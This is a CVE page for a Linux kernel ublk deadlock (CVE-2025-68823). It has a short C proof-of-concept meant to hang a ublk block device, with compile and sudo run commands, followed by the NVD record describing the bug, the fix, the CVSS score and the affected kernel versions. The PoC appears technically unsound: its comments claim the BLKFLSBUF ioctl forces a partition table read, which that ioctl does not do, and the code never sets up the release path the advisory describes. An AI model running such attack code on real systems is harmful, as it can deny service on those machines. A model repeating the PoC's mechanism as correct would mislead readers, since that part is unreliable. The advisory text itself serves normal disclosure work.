CVE-2025-68823

// CVE-2025-68823 PoC - ublk deadlock trigger // This PoC demonstrates the deadlock condition when reading partition table #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/fs.h> int main(int argc, char *argv[]) { const char *device = argv[1] ? argv[1] : "/dev/ublkb0"; printf("Opening ublk device: %s\n", device); // Open the ublk block device int fd = open(device, O_RDONLY); if (fd < 0) { perror("Failed to open device"); return 1; } printf("Attempting to read partition table...\n"); // Issue BLKFLSBUF or similar ioctl to trigger partition table read // This will cause bdev_open() -> read I/O -> __ublk_complete_rq() -> fput() -> deadlock // Try to trigger the deadlock by forcing partition table read if (ioctl(fd, BLKFLSBUF, 0) < 0) { // Expected to hang or fail due to deadlock perror("Ioctl failed - possible deadlock condition"); } // If we reach here, close the device close(fd); return 0; } // Compile: gcc -o ublk_deadlock_poc ublk_deadlock.c // Run: sudo ./ublk_deadlock_poc /dev/ublkb0 // Note: Requires ublk driver loaded and a configured ublk device

{"cve": {"id": "CVE-2025-68823", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:04.660", "lastModified": "2026-02-26T18:43:03.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nublk: fix deadlock when reading partition table\n\nWhen one process(such as udev) opens ublk block device (e.g., to read\nthe partition table via bdev_open()), a deadlock[1] can occur:\n\n1. bdev_open() grabs disk->open_mutex\n2. The process issues read I/O to ublk backend to read partition table\n3. In __ublk_complete_rq(), blk_update_request() or blk_mq_end_request()\n runs bio->bi_end_io() callbacks\n4. If this triggers fput() on file descriptor of ublk block device, the\n work may be deferred to current task's task work (see fput() implementation)\n5. This eventually calls blkdev_release() from the same context\n6. blkdev_release() tries to grab disk->open_mutex again\n7. Deadlock: same task waiting for a mutex it already holds\n\nThe fix is to run blk_update_request() and blk_mq_end_request() with bottom\nhalves disabled. This forces blkdev_release() to run in kernel work-queue\ncontext instead of current task work context, and allows ublk server to make\nforward progress, and avoids the deadlock.\n\n[axboe: rewrite comment in ublk]"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nublk: soluciona un interbloqueo al leer la tabla de particiones\n\nCuando un proceso (como udev) abre el dispositivo de bloques ublk (por ejemplo, para leer la tabla de particiones a través de bdev_open()), puede ocurrir un interbloqueo[1]:\n\n1. bdev_open() adquiere disk-&gt;open_mutex\n2. El proceso emite E/S de lectura al backend de ublk para leer la tabla de particiones\n3. En __ublk_complete_rq(), blk_update_request() o blk_mq_end_request() ejecuta las retrollamadas bio-&gt;bi_end_io()\n4. Si esto activa fput() en el descriptor de archivo del dispositivo de bloques ublk, el trabajo puede ser aplazado al trabajo de tarea de la tarea actual (ver la implementación de fput())\n5. Esto finalmente llama a blkdev_release() desde el mismo contexto\n6. blkdev_release() intenta adquirir disk-&gt;open_mutex de nuevo\n7. Interbloqueo: misma tarea esperando por un mutex que ya posee\n\nLa solución es ejecutar blk_update_request() y blk_mq_end_request() con las mitades inferiores deshabilitadas. Esto fuerza a blkdev_release() a ejecutarse en el contexto de la cola de trabajo del kernel en lugar del contexto de trabajo de la tarea actual, y permite al servidor ublk avanzar, y evita el interbloqueo.\n\n[axboe: reescribir comentario en ublk]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-667"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.6.124", "matchCriteriaId": "07A21134-3555-4ED3-8B0A-940F93C45530"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.70", "matchCriteriaId": "F3791390-0628-4808-99EF-1ED8ABF60933"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0460e09a614291f06c008443f47393c37b7358e7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/64c0b7e2293757e8320f13434cd809f1c9257a62", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9bcc47343ee0ef346aa7b2b460c8ff56bd882fe7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c258f5c4502c9667bccf5d76fa731ab9c96687c1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}